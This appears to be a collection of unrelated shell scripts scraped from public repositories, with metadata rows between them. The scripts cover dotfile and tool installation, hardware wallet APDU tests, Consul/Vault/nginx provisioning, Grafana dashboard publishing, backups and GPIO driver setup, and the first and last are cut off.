if [[ "$keylnk" = "$wd/fish/fish_user_key_bindings.fish" ]]; then
echo "fish key bindings successfully installed"
else
echo "ERROR: missing fish key bindings"
fi
if [[ "$nvimlnk" = "$wd/nvim/init.vim" ]]; then
echo "~/.config/nvim/init.vim successfully copied"
else
echo "ERROR: missing init.vim"
fi
if [[ $os = "Darwin" ]]; then
echo "OS X runs all shells as login, be sure to add an appropriate source command to .bash_profile"
echo "See my .bashrc for details."
else
if command -v greadlink > /dev/null; then
termlnk="$(greadlink -f ~/.config/terminology/config/standard/base.cfg)"
else
termlnk="$(readlink -f ~/.config/terminology/config/standard/base.cfg)"
fi
if command -v terminology >/dev/null; then
echo "Terminology successfully installed."
else
echo "ERROR: missing terminology."
fi
if [[ "$termlnk" = "$wd/terminology/terminology.cfg" ]]; then
echo "~/.config/terminology/config/standard/base.cfg successfully copied"
else
echo "ERROR: missing terminology base.cfg"
fi
fi
| true
|
9ebb6c0e8801df3998e214921627faec02e9492b
|
Shell
|
bakingbacon/app-tezos
|
/test/apdu-tests/baking/baking_test.sh
|
UTF-8
| 2,822
| 2.859375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
set -Eeuo pipefail
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
cd "$DIR"
fail() {
echo "$1"
echo
exit 1
}
{
echo; echo "Authorize baking"
echo "ACCEPT"
{
echo 8001000011048000002c800006c18000000080000000 # Authorize baking
} | ../apdu.sh
}
{
echo; echo "Baking a block with multiple packets should fail"
echo "ACCEPT Reset HWM"
{
echo 800681000400000000 # Reset HWM
} | ../apdu.sh
echo; echo "Self-delegation and block header: EXPECTING FAILURE"; sleep 2;
({
echo 8004000011048000002c800006c18000000080000000
echo 800401005703cae1b71a3355e4476620d68d40356c5a4e5773d28357fea2833f24cd99c767260a0000aed011841ffbb0bcc3b51c80f2b6c333a1be3df0ec09f9ef01f44e9502ff00aed011841ffbb0bcc3b51c80f2b6c333a1be3df0
echo 800481000a017a06a7700000000102 # Bake block at level 1
} | ../apdu.sh && fail ">>> EXPECTED FAILURE") || true
echo; echo "Prefix 00 byte: EXPECTING FAILURE"; sleep 2;
({
echo 8004000011048000002c800006c18000000080000000
echo 800401000100 # Prefix packet starting with 00
echo 800481000a017a06a7700000000102 # Bake block at level 1
} | ../apdu.sh && fail ">>> EXPECTED FAILURE") || true
echo; echo "Prefix 03: EXPECTING FAILURE"; sleep 2;
({
echo 8004000011048000002c800006c18000000080000000
echo 800401000103 # Prefix packet starting with 03
echo 800481000a017a06a7700000000102 # Bake block at level 1
} | ../apdu.sh && fail ">>> EXPECTED FAILURE") || true
echo; echo "Postfix 00... EXPECTING FAILURE"; sleep 2;
({
echo 8004000011048000002c800006c18000000080000000
echo 800401000a017a06a7700000000102 # Bake block at level 1
echo 800481000100 # Postfix packet starting with 00
} | ../apdu.sh && fail ">>> EXPECTED FAILURE") || true
}
{
echo; echo "Endorsing a previous level should fail"
echo ACCEPT Reset HWM
{
echo 800681000400000000 # Reset HWM
echo 8004000011048000002c800006c18000000080000000
echo 800481000a017a06a7700000000102 # Bake block at level 1
echo 8004000011048000002c800006c18000000080000000
echo 800481002a027a06a77000000000000000000000000000000000000000000000000000000000000000000000000001 # Endorse at level 1
echo 8004000011048000002c800006c18000000080000000
echo 800481002a027a06a77000000000000000000000000000000000000000000000000000000000000000000000000002 # Endorse at level 2
} | ../apdu.sh
echo "EXPECT FAILURE"; sleep 2;
({
echo 8004000011048000002c800006c18000000080000000
echo 800481002a027a06a77000000000000000000000000000000000000000000000000000000000000000000000000001 # Endorse at level 1 (should fail)
} | ../apdu.sh && fail ">>> EXPECTED FAILURE") || true
}
| true
|
63063d6f16b5116b626a710d8d5624896459a4c3
|
Shell
|
davidjfelix-legacy/provisioner
|
/modules/bazel/linux-amd64-ubuntu-zesty
|
UTF-8
| 529
| 2.59375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Bash strict mode
set -euvo pipefail
# Install deps
sudo apt-get -y install \
apt-transport-https \
ca-certificates \
curl \
software-properties-common
# Get the bazel gpg key and trust it
curl https://bazel.build/bazel-release.pub.gpg | sudo apt-key add -
# Add bazel repo
sudo add-apt-repository -y "deb [arch=amd64] http://storage.googleapis.com/bazel-apt stable jdk1.8"
# Install bazel
sudo apt-get -y update
sudo apt-get -y install bazel
# TODO: add zsh and bash completion to this step
| true
|
c8f73b1d73e49745fdffe316a62f6bbfab7251f5
|
Shell
|
kecorbin/consul-hcs-vm-demo
|
/assets/terraform/ingress/templates/nginx-ingress.sh
|
UTF-8
| 5,963
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
#Utils
apt-get update -y
apt-get upgrade -y
apt-get install -y unzip jq nginx
# Fix for Nginx PID problem in Ubuntu 16.04 in an EC2 instance
systemctl stop nginx
mkdir /etc/systemd/system/nginx.service.d
printf "[Service]\nExecStartPost=/bin/sleep 0.1\n" > /etc/systemd/system/nginx.service.d/override.conf
systemctl daemon-reload
systemctl start nginx
service_id=$(hostname)
hostname=$(hostname)
#get the jwt from azure msi
jwt="$(curl -s 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fmanagement.azure.com%2F' -H Metadata:true | jq -r '.access_token')"
#log into vault
token=$(curl -s \
--request POST \
--data '{"role": "ingress", "jwt": "'$jwt'"}' \
http://${vault_server}:8200/v1/auth/azure/login | jq -r '.auth.client_token')
#get the consul secret
consul_secret=$(curl -s \
--header "X-Vault-Token: $token" \
http://${vault_server}:8200/v1/secret/data/consul/shared | jq '.data.data')
#extract the bootstrap info
gossip_key=$(echo $consul_secret | jq -r .gossip_key)
retry_join=$(echo $consul_secret | jq -r .retry_join)
ca=$(echo $consul_secret | jq -r .ca)
#debug
echo $gossip_key
echo $retry_join
echo "$ca"
# Install Consul
cd /tmp
wget https://releases.hashicorp.com/consul/1.8.0+ent/consul_1.8.0+ent_linux_amd64.zip -O consul.zip
unzip ./consul.zip
mv ./consul /usr/bin/consul
mkdir -p /etc/consul/config
cat <<EOF > /etc/consul/ca.pem
"$ca"
EOF
# Generate the consul startup script
#!/bin/sh -e
cat <<EOF > /etc/consul/consul_start.sh
#!/bin/bash -e
# Get JWT token from the metadata service and write it to a file
curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fmanagement.azure.com%2F' -H Metadata:true -s | jq -r .access_token > ./meta.token
# Use the token to log into the Consul server, we need a valid ACL token to join the cluster and setup autoencrypt
CONSUL_HTTP_ADDR=https://$retry_join consul login -method azure -bearer-token-file ./meta.token -token-sink-file /etc/consul/consul.token
# Generate the Consul Config which includes the token so Consul can join the cluster
cat <<EOC > /etc/consul/config/consul.json
{
"acl":{
"enabled":true,
"down_policy":"async-cache",
"default_policy":"deny",
"tokens": {
"default":"\$(cat /etc/consul/consul.token)"
}
},
"ca_file":"/etc/consul/ca.pem",
"verify_outgoing":true,
"datacenter":"${consul_datacenter}",
"encrypt":"$gossip_key",
"server":false,
"log_level":"INFO",
"ui":true,
"retry_join":[
"$retry_join"
],
"ports": {
"grpc": 8502
},
"auto_encrypt":{
"tls":true
}
}
EOC
# Run Consul
/usr/bin/consul agent -node=$(hostname) -config-dir=/etc/consul/config/ -data-dir=/etc/consul/data
EOF
chmod +x /etc/consul/consul_start.sh
# Setup Consul agent in SystemD
cat <<EOF > /etc/systemd/system/consul.service
[Unit]
Description=Consul Agent
After=network-online.target
[Service]
WorkingDirectory=/etc/consul
ExecStart=/etc/consul/consul_start.sh
Restart=always
[Install]
WantedBy=multi-user.target
EOF
# Install Consul-template
CONSUL_TEMPLATE_VERSION="0.25.1"
curl --silent --remote-name https://releases.hashicorp.com/consul-template/$${CONSUL_TEMPLATE_VERSION}/consul-template_$${CONSUL_TEMPLATE_VERSION}_linux_amd64.zip
unzip consul-template_$${CONSUL_TEMPLATE_VERSION}_linux_amd64.zip
mv consul-template /usr/local/bin/
rm unzip consul-template_$${CONSUL_TEMPLATE_VERSION}_linux_amd64.zip
sudo cat << EOF > /etc/systemd/system/consul-template.service
[Unit]
Description="Template rendering, notifier, and supervisor for @hashicorp Consul and Vault data."
Requires=network-online.target
After=network-online.target
[Service]
User=root
Group=root
ExecStart=/usr/local/bin/consul-template -config=/etc/consul-template/consul-template-config.hcl
ExecReload=/usr/local/bin/consul reload
KillMode=process
Restart=always
LimitNOFILE=65536
[Install]
WantedBy=multi-user.target
EOF
mkdir --parents /etc/consul-template
mkdir --parents /etc/ssl
touch /etc/consul-template/consul-template-config.hcl
cat << SERVICES > /etc/consul/config/services.hcl
services = [
{
id = "$(hostname)"
name = "ingress-gateway"
port = 8080
checks = [
{
id = "HTTP-TCP"
interval = "10s"
tcp = "localhost:8080"
timeout = "1s"
}
]
}
]
SERVICES
# Generate consul connect certs for ingress-gateway service
cat << EOF > /etc/ssl/ca.crt.tmpl
{{range caRoots}}{{.RootCertPEM}}{{end}}
EOF
cat << EOF > /etc/ssl/cert.pem.tmpl
{{with caLeaf "ingress-gateway"}}{{.CertPEM}}{{end}}
EOF
cat << EOF > /etc/ssl/cert.key.tmpl
{{with caLeaf "ingress-gateway"}}{{.PrivateKeyPEM}}{{end}}
EOF
# create consul template for nginx config
cat << EOF > /etc/nginx/conf.d/load-balancer.conf.ctmpl
upstream web {
{{range connect "web"}}
server {{.Address}}:{{.Port}};
{{end}}
}
server {
listen 8080;
server_name localhost;
location / {
proxy_pass https://web;
proxy_http_version 1.1;
# these refer to files written by templates above
proxy_ssl_certificate /etc/ssl/cert.pem;
proxy_ssl_certificate_key /etc/ssl/cert.key;
proxy_ssl_trusted_certificate /etc/ssl/ca.crt;
}
}
EOF
# create consul-template Config
cat << EOF > /etc/consul-template/consul-template-config.hcl
template {
source = "/etc/nginx/conf.d/load-balancer.conf.ctmpl"
destination = "/etc/nginx/conf.d/default.conf"
command = "service nginx reload"
}
template {
source = "/etc/ssl/ca.crt.tmpl"
destination = "/etc/ssl/ca.crt"
}
template {
source = "/etc/ssl/cert.pem.tmpl"
destination = "/etc/ssl/cert.pem"
}
template {
source = "/etc/ssl/cert.key.tmpl"
destination = "/etc/ssl/cert.key"
}
EOF
# Restart SystemD
systemctl daemon-reload
systemctl enable consul
systemctl enable consul-template
systemctl restart consul
systemctl restart consul-template
service nginx restart
| true
|
bd8446c9920d98961ee12cf45e5bc4fc3dd97055
|
Shell
|
kittyhawk/scripts
|
/test
|
UTF-8
| 823
| 3.640625
| 4
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
#!/bin/bash
#set -x
s=10
list="$1"
if [[ -z $list ]]
then
list="1 2 4 8 16 32 64 128 256 512"
fi
for i in $list
do
echo "$i: allocating ...."
khalloc="$(khget -x user${i} $i)"
ncount=$(echo "$khalloc" | khdo peripcmd "echo %ip%" | wc -l)
if (( $ncount != $i ))
then
echo "ERROR: $i: did not get the number of nodes expected $ncount != $i"
echo $khalloc
break
fi
echo "$i: booting...."
echo "$khalloc" | khdo write 'setenv eth1 "$p0ip $p0mask" && run kboot'
echo "sleeping for $s"
sleep $s
echo "$i: pinging..."
pcount=$(echo "$khalloc" | khdo peripcmd "if ping -c 1 %ip% >/dev/null 2>&1;then echo good; else echo bad;fi" | grep good | wc -l)
if (( $pcount != $i ))
then
echo "ERROR: $i: was not able to ping all nodes $pcount != $i"
echo $khalloc
break
fi
done
| true
|
2f23a57baa6e886ea9a307d2c11cd380288b714d
|
Shell
|
jharibabu/Test_monitoring
|
/github-actions/publish-dashboards/run.sh
|
UTF-8
| 1,729
| 3.765625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
set -euo pipefail
GRAFANA="${1}"
function get_folder_id() {
fname="\"${1}\""
existing=$(curl -sf -X GET \
-H "Authorization: Bearer ${TOKEN}" \
-H 'Content-type: application/json' \
-H 'Accept: application/json' \
"${GRAFANA}/api/folders" | \
jq ".[] | select(.title == ${fname}) | .id")
if [[ -n "${existing}" ]]; then
echo "${existing}"
return 0
fi
new=$(curl -sf -X POST \
-H "Authorization: Bearer ${TOKEN}" \
-H 'Content-type: application/json' \
-H 'Accept: application/json' \
"${GRAFANA}/api/folders" \
--data-binary "{ \"title\": ${fname} }" | \
jq '.id')
echo "${new}"
return 0
}
bad=0
for f in dashboards/**/*.jsonnet ; do
folder=$(dirname "$f" | sed 's/^dashboards\///')
folder_id=$(get_folder_id "${folder}")
dbname=$(basename "$f" | sed 's/\.jsonnet$//')
echo "Updating dashboard ${folder}/${dbname}"
if ! jsonnet -J /grafonnet-lib -J . "${f}" | \
jq "{ \"dashboard\": ., \"folderId\": ${folder_id}, \"overwrite\": true }" > \
"/tmp/${dbname}.json" ; then
echo "Failed to build ${folder}/${dbname}"
bad=$((bad+1))
continue
fi
if ! curl -sf -X POST \
-H "Authorization: Bearer ${TOKEN}" \
-H 'Content-type: application/json' \
-H 'Accept: application/json' \
"${GRAFANA}/api/dashboards/db" \
--data-binary "@/tmp/${dbname}.json" ; then
echo "Failed to update ${folder}/${dbname}"
bad=$((bad+1))
fi
done
exit ${bad}
| true
|
337b8e10fc4dc9a0c0ee078b099130a930c95a79
|
Shell
|
Mihail-Kostov/dotfiles-26
|
/bin/backup-dewback
|
UTF-8
| 762
| 2.71875
| 3
|
[] |
no_license
|
#!/bin/bash
OPTIONS="-e ssh --relative --compress --archive --delete-excluded --progress --human-readable "
SERVER="backup.remote:cs-dewback"
cd /Users/csexton
# Rsync to Dreamhost
#rsync $OPTIONS Projects Pictures Documents $SERVER \
# --exclude="OmniFocus Backups" \
# --exclude="*vmwarevm" \
# --exclude="Apple Marketing Material" \
# --exclude="*DS_Store"
# S3
S3_EXCLUDES="--exclude \".DS_Store\" --exclude=\"*.git/*\" --exclude=\"*vmwarevm\" --exclude=\"tmp\" --exclude=\"*.tmp\""
. ~/.aws/backup.conf
echo $S3_EXCLUDES
aws s3 sync ~/Pictures s3://dewback-backup/Pictures --delete $S3_EXCLUDES
aws s3 sync ~/Projects s3://dewback-backup/Projects --delete $S3_EXCLUDES
aws s3 sync ~/Documents s3://dewback-backup/Documents --delete $S3_EXCLUDES
| true
|
e0be1ef2fee4b8851be9a0bc818bb159be99caf7
|
Shell
|
linasn/tv-tuner
|
/pcap_txt_to_a828_replay.sh
|
UTF-8
| 253
| 2.765625
| 3
|
[] |
no_license
|
#!/bin/bash
[[ $# -ne 2 ]] && echo "Usage: $0 input_file output_file" && exit 1
sed -n '/Time/d;/^$/d;s/ *[0-9]* \([\.0-9]*\) *host.*/[\1]/p;s/\(00[4-9]0 [ 0-9a-f]* \).*/\1/p' $1 |
awk '{$1=$1};1' | sed ':t;$!N;/\n00[567]0/s///;tt;s/^0040 //;P;D' > $2
| true
|
7bc9fdec5fc222044d8a0b38a0d8afe15fd3a644
|
Shell
|
rbasoalto/dotfiles
|
/bashrc
|
UTF-8
| 448
| 3.140625
| 3
|
[] |
no_license
|
path_remove () { export PATH=`echo -n $PATH | awk -v RS=: -v ORS=: '$0 != "'$1'"' | sed 's/:$//' | sed 's/$://'`; }
path_append () { path_remove $1; export PATH="$PATH:$1"; }
path_prepend () { path_remove $1; export PATH="$1:$PATH"; }
if [[ "$OSTYPE" == "darwin"* ]]; then
# Homebrew binaries first
path_prepend /usr/local/bin
fi
path_prepend ~/bin
if [[ "$OSTYPE" == "darwin"* ]]; then
export JAVA_HOME=$(/usr/libexec/java_home)
fi
| true
|
2974b5442fe2f063b53a67e405b3c85158b52e68
|
Shell
|
ucd-plse/func2vec-fse2018-artifact
|
/lib/eclat/eclat/ex/hdr2set
|
UTF-8
| 219
| 2.765625
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
gawk '
(NR == 1) {
for (i = 0; ++i <= NF; )
items[i] = $i;
}
(NR > 1) {
for (i = k = 0; ++i <= NF; ) {
if (k++ > 0) printf(" ");
printf("%s=%s", items[i], $i);
}
printf("\n");
}' $1 > $2
| true
|
94b6feea23dad33873d89aff801252eede55b33b
|
Shell
|
miecio45/dotfiles
|
/scripts/build_neovim
|
UTF-8
| 416
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/bash
APT_GET_CMD=$(which apt-get)
YAOURT_CMD=$(which yaourt)
if [[ ! -z $APT_GET_CMD ]]; then
apt-get install libtool autoconf automake cmake g++ pkg-config unzip git
git clone https://github.com/neovim/neovim
cd neovim
make;
sudo make install
elif [[ ! -z $YAOURT_CMD ]]; then
yaourt -S neovim-git --noconfirm
else
echo "error can't install package $PACKAGE"
exit 1;
fi
| true
|
4d0f48a1ed76fc86b7742e08f2f481ae6d7cf859
|
Shell
|
massimiliano-brocchini/conf-and-utils
|
/bin/explode
|
UTF-8
| 178
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/zsh
sep=$1
string=$2
value=""
for i in {1..${#string}}; do
x=$string[i]
if [[ "$x" == "$sep" ]]; then
echo $value
value=""
else
value+=$x
fi
done
echo $value
| true
|
74df85c7251d1847676a6c672dd05620e8606e00
|
Shell
|
SilverSoldier/setup
|
/setup2.sh
|
UTF-8
| 1,424
| 2.828125
| 3
|
[] |
no_license
|
# To setup system based on my configurations
# Step 2: back up old files and replace with new files from customization folder
cd
echo "--> Back up old bashrc"
# Backup old bashrc
mv ~/.bashrc ~/.bashrc_old || :
cp ~/customization/dotfiles/.bashrc ~/
echo "--> Back up old vimrc"
# Backup old vimrc
mv ~/.vimrc ~/.vimrc_old || :
cp ~/customization/dotfiles/.vimrc ~/
echo "--> Installing plug"
curl -fLo ~/.vim/autoload/plug.vim --create-dirs \
https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim
echo "--> Installing vim plugins"
vim +PlugInstall +qall
echo "--> Back up old aliases"
# Backup old bash_aliases
mv ~/.aliases ~/.aliases_old || :
cp ~/customization/dotfiles/.aliases ~/
echo "--> Back up old gitconifg"
# Backup old gitconfig
mv ~/.gitconfig ~/.gitconfig_old || :
cp ~/customization/dotfiles/.gitconfig ~/
cd
echo "--> Installing tmux in case not already installed"
# install tmux
sudo apt-get install tmux
echo "--> Back up old tmux_conf"
# Backup old tmux_conf
mv ~/.tmux_conf ~/.tmux_conf_old || true
cp ~/customization/dotfiles/.tmux.conf ~/
echo "--> Installing urxvt in case not already installed"
# install urxvt
sudo apt-get install rxvt-unicode
cd
echo "--> Back up old urxvt configuration"
# Backup old Xresources
mv ~/.Xresources ~/.Xresources_old || :
mv ~/customization/dotfiles/.Xresources ~/
# apt-get some necessary applications
sudo apt-get install zathura
| true
|
0cab23021876e9c0840313ea56b5704792963b7f
|
Shell
|
karatatar/dotfiles
|
/scripts/package/aux/install.sh
|
UTF-8
| 1,411
| 3.828125
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
check_if_is_installed() {
local -r package="$1"
local -r fn="$(package::fn "$package" is_installed)"
if platform::command_exists $fn; then
$fn
else
platform::command_exists "$package"
fi
}
install_if_not_installed() {
local -r package="$1"
local -r pkg_managers="$(dict::get "$OPTIONS" pkg_managers)"
local map_fn="" install_fn="" map="" actual_package=""
if check_if_is_installed "$package"; then
echoerr "$package is already installed"
return 0
fi
map_fn="${package}::map"
if platform::command_exists $map_fn; then
map="$($map_fn || echo "")"
fi
for pkg_manager in $pkg_managers; do
install_fn="${package}::${pkg_manager}"
actual_package="$(echo "$map" | dict::get "$pkg_manager" || echo "")"
if [[ -n "$actual_package" ]] && "${pkg_manager}::install" "$actual_package"; then
return 0
elif platform::command_exists "$install_fn" && $install_fn; then
return 0
elif "${pkg_manager}::install" "$package"; then
return 0
fi
done
return 1
}
handler::install() {
local -r packages="$(dict::get "$OPTIONS" values)"
local failures=0
for package in $packages; do
package::load_custom_recipe "$package"
if ! install_if_not_installed "$package"; then
failures=$((failures+1))
fi
done
return $failures
}
| true
|
56ee321c9347bec235dfbdc1cd30719ef24d12f5
|
Shell
|
apoorvam/moc-apps
|
/ci/diff-with-previous.sh
|
UTF-8
| 963
| 3.796875
| 4
|
[] |
no_license
|
#!/bin/bash
OPT_BASE_REF='HEAD^'
while getopts fr: ch; do
case "$ch" in
(r) OPT_BASE_REF=$OPTARG
;;
(f) OPT_FORCE=1
;;
(\?) echo "ERROR: unknown optoin: $1" >&2
exit 2
;;
esac
done
shift $(( OPTIND - 1 ))
if [[ -z "$1" ]]; then
echo "ERROR: missing required argument <overlay>" >&2
exit 2
fi
overlay=$1
shift
if [[ -z $OPT_FORCE ]] && ! git diff-index --quiet HEAD; then
echo "ERROR: please commit your changes first." >&2
exit 1
fi
workdir=$(mktemp -d tmp.kustomizeXXXXXX)
trap "rm -rf $workdir" EXIT
mkdir -p $workdir/prev $workdir/head
git archive "${OPT_BASE_REF}" | tar -C $workdir/prev -xf -
git archive HEAD | tar -C $workdir/head -xf -
diff -u \
<([[ -d ${workdir}/prev/${overlay} ]] && kustomize build $workdir/prev/${overlay}) \
<([[ -d ${workdir}/head/${overlay} ]] && kustomize build $workdir/head/${overlay})
exit 0
| true
|
77521370f177fef4b269733e678cb8d25a433e2a
|
Shell
|
bishnubibhabdas/gitjenkinintegration
|
/myscript.sh
|
UTF-8
| 152
| 2.921875
| 3
|
[] |
no_license
|
echo "Welcome to the world of shell scripting"
echo 'Default script is bash'
echo 'Thank you'
echo "Enter your name"
read x
echo "my name is" $x "Das"
| true
|
ce310de155dd3ac3dc4d78a0b70a5e6dfcbc034d
|
Shell
|
Wellsjian/20180826
|
/xiaojian/forth_phase/shell/day02/08_func_directory.sh
|
UTF-8
| 260
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
create_dir(){
read -p "请输入目录名:" dirname
directory="/home/tarena/materials/xiaojian/forth_phase/shell/day02/$dirname"
if [ !-e $directory ];then
mkdir $directory
else
echo "文件夹已经存在"
fi
}
create_dir
| true
|
5a7115efdcfbc6dbe8df03cf7e75e23e0abf12ac
|
Shell
|
Mgvanhoy52/AccessoryServer
|
/install/install_io.sh
|
UTF-8
| 2,701
| 2.90625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
echo "installing wiring-pi"
git clone git://git.drogon.net/wiringPi
cd wiringPi
./build
cd ..
rm -rf wiringPi
IRIN=15
IROUT=18
RFIN=2
RFOUT=0
echo "Do you want to install the components for transmitting and receiving infrared signals?"
echo "Enter 'skip' if you want to skip this step, otherwise press any key."
read answer
if [[ $answer != "skip" ]]
then
echo "\nIn the following steps you can change the pins for receiving and transmitting signals."
echo "The recommended pins are the default pins (only change them if you know what you are doing).\n"
echo "The infrared Pins are mapped after the 'BCM' scheme."
echo "Here is the mapping table: (Please ignore the 'Mode' and the 'V' column)"
gpio readall
echo "\nEnter the input pin for the infrared receiver (Press enter for default: $IRIN):"
read input
if [ $input ]
then
IRIN=$input
fi
echo "Input pin is $IRIN!"
echo "Enter the output pin for the infrared transmitter (Press enter for default: $IROUT):"
read input
if [ $input ]
then
IROUT=$input
fi
echo "Output pin is $IROUT!"
echo "installing gpio-reflect"
git clone https://github.com/Appyx/gpio-reflect.git
cd gpio-reflect
chmod +x build.sh
./build.sh
cp gpio-reflect.ko /lib/modules/$(uname -r)/kernel/drivers/
echo gpio-reflect >> /etc/modules
echo "options gpio-reflect in=$IRIN out=$IROUT" > /etc/modprobe.d/gpio-reflect.conf
depmod
cd ..
rm -rf gpio-reflect
fi
echo "Do you want to install the components for transmitting and receiving infrared signals?"
echo "Enter 'skip' if you want to skip this step, otherwise press any key."
read answer
if [[ $answer != "skip" ]]
then
echo "\nIn the following steps you can change the pins for receiving and transmitting signals."
echo "The recommended pins are the default pins (only change them if you know what you are doing).\n"
echo "The 433MHz Pins are mapped after the 'wPi' scheme.\n"
echo "Here is the mapping table: (Please ignore the 'Mode' and the 'V' column)"
gpio readall
echo "Enter the input pin for the 433MHz receiver (Press enter for default: $RFIN):"
read input
if [ $input ]
then
RFIN=$input
fi
echo "Input pin is $RFIN!"
echo "Enter the output pin for the 433MHz transmitter (Press enter for default: $RFOUT):"
read input
if [ $input ]
then
RFOUT=$input
fi
echo "Output pin is $RFOUT!"
echo "installing rc-switch"
git clone https://github.com/sui77/rc-switch.git
sed -i "1i#define PIN $RFOUT" codesend.cpp
sed -i "1i#define PIN $RFIN" sniffer.cpp
make
echo "$(tail -n +2 codesend.cpp)" > codesend.cpp
echo "$(tail -n +2 sniffer.cpp)" > sniffer.cpp
mkdir ../bin
mv codesend ../bin/codesend
mv sniffer ../bin/sniffer
rm -rf codesend.o
rm -rf sniffer.o
rm -rf rc-switch
fi
| true
|
35d58cc4e28173f6af6a0ee1dc1270eee63f87f8
|
Shell
|
helau/gen2vdr
|
/etc/gen2vdr/_config/bin/powerb.sh
|
UTF-8
| 716
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/bash
# Skript which is executed when the powerbutton is pressed
source /_config/bin/g2v_funcs.sh
EJECT_CMD="/_config/bin/eject.sh"
if [ "$(pidof vdr)" != "" ] ; then
HALT_CMD="/usr/bin/svdrpsend.sh HITK power"
else
HALT_CMD="shutdown -r now"
fi
#set -x
CMD="$HALT_CMD"
if [ "${PB_FUNCTION}" = "EJECT" ] ; then
CMD="$EJECT_CMD"
elif [ "${PB_FUNCTION/HALT_EJECT/}" = "" ] ; then
PBTMP="/tmp/~pb"
if [ -f $PBTMP ] ; then
ACTDATE=$(date +%s)
FDATE=$(ls -l --time-style=+%s $PBTMP | tr -s ' ' |cut -f6 -d ' ')
DIFF=$(($ACTDATE - $FDATE))
if [ $DIFF -le 2 ] ; then
CMD=$EJECT_CMD
fi
fi
touch $PBTMP
fi
glogger -s "Starte <$CMD>"
screen -dm sh -c "$CMD"
| true
|
b7f33fa99b63843d1d878f439b810540595dbf87
|
Shell
|
mjlsuccess/mrpt
|
/travis/travis_main.sh
|
UTF-8
| 2,721
| 3.90625
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
set -e # Make sure any error makes the script to return an error code
MRPT_DIR=`pwd`
BUILD_DIR=build
CMAKE_C_FLAGS="-Wall -Wextra -Wabi -O2"
CMAKE_CXX_FLAGS="-Wall -Wextra -Wabi -O2"
EXTRA_CMAKE_ARGS="-DDISABLE_PCL=ON" # PCL causes link errors (?!)
function prepare_install()
{
apt-get install build-essential software-properties-common gcc g++ clang pkg-config cmake python-pip -y
apt-get install git-core -y
apt-get install ccache -y
if [ "$TASK" == "lint" ]; then
pip install -r travis/python_reqs.txt
fi
if [ "$DEPS" != "minimal" ]; then
apt-get install libftdi-dev zlib1g-dev libusb-1.0-0-dev libdc1394-22-dev -y
apt-get install libjpeg-dev libopencv-dev libgtest-dev libeigen3-dev -y
apt-get install libsuitesparse-dev libopenni2-dev libudev-dev -y
apt-get install libboost-python-dev libpython-dev python-numpy -y
# We must use a custom PPA to solve errors in PCL official pkgs
add-apt-repository ppa:jolting/backport-mrpt
apt-get update -qq
apt-get install libpcl-dev -y
if [ "$DEPS" != "headless" ]; then
apt-get install libwxgtk3.0-dev -y
apt-get install freeglut3-dev -y
apt-get install libavformat-dev libswscale-dev -y
apt-get install libassimp-dev -y
apt-get install qtbase5-dev libqt5opengl5-dev -y
fi
fi
}
function prepare_build_dir()
{
# Make sure we dont have spurious files:
cd $MRPT_DIR
git clean -fd || true
rm -fr $BUILD_DIR || true
mkdir -p $BUILD_DIR
cd $BUILD_DIR
}
function build ()
{
prepare_build_dir
# gcc is too slow and we have a time limit in Travis CI: exclude examples when building with gcc
if [ "$CC" == "gcc" ]; then
BUILD_EXAMPLES=FALSE
else
BUILD_EXAMPLES=TRUE
fi
if [ "$DEPS" == "minimal" ]; then
DISABLE_PYTHON_BINDINGS=ON
else
DISABLE_PYTHON_BINDINGS=OFF
fi
VERBOSE=1 cmake $MRPT_DIR \
-DBUILD_EXAMPLES=$BUILD_EXAMPLES \
-DBUILD_APPLICATIONS=TRUE \
-DBUILD_TESTING=FALSE \
-DDISABLE_PYTHON_BINDINGS=$DISABLE_PYTHON_BINDINGS \
$EXTRA_CMAKE_ARGS
make -j3
cd $MRPT_DIR
}
command_exists () {
type "$1" &> /dev/null ;
}
function test ()
{
# gcc is too slow and we have a time limit in Travis CI:
if [ "$CC" == "gcc" ] && [ "$TRAVIS_OS_NAME" == "osx" ]; then
return
fi
prepare_build_dir
cmake $MRPT_DIR \
-DBUILD_APPLICATIONS=FALSE \
-DCMAKE_BUILD_TYPE=${BUILD_TYPE} \
$EXTRA_CMAKE_ARGS
# Remove gdb use for coverage test reports.
# Use `test_gdb` to show stack traces of failing unit tests.
# if command_exists gdb ; then
# make test_gdb
# else
make test
# fi
cd $MRPT_DIR
}
prepare_install
case $TASK in
build ) build;;
test ) test;;
esac
| true
|
790777c36fd47dcdc8d99f9248c19c99de2fb911
|
Shell
|
hugmatj/viconf
|
/viconf-check.sh
|
UTF-8
| 581
| 3.6875
| 4
|
[
"LicenseRef-scancode-warranty-disclaimer",
"0BSD"
] |
permissive
|
#!/bin/sh
repo_url=https://github.com/weakish/viconf
if grep -q viconf $config_file ; then
echo
echo "Adding entries to viconf's database?"
echo "Consider sending a pull request. Thanks."
echo "You can find viconf at" $repo_url
echo
fi
if [ $config_file_is_empty ]; then
if [ -n "$template_config_file" ]; then
diff -u $template_config_file $1
else
cat $1 | sed -r -e 's/^/+ /'
fi
else
diff -u $config_file $1
fi
read -p 'Review your changes. Do you want to save it?[Y/n]:' save_it
case $save_it in
n|N) exit 1 ;;
*) exit 0 ;;
esac
| true
|
1a03bf2e5f34b25adfa90b2c818ee0e81b78a2b0
|
Shell
|
JuserZhang/iso-builder
|
/pyisobuilder-nonon-free/scripts/I01-generate-sqfs-file.sh
|
UTF-8
| 435
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
CHROOT_PATH=$1
ISO_BUILD_PATH=$2
LIVE_PATH=$3
SQFSNAME=${4:-filesystem}
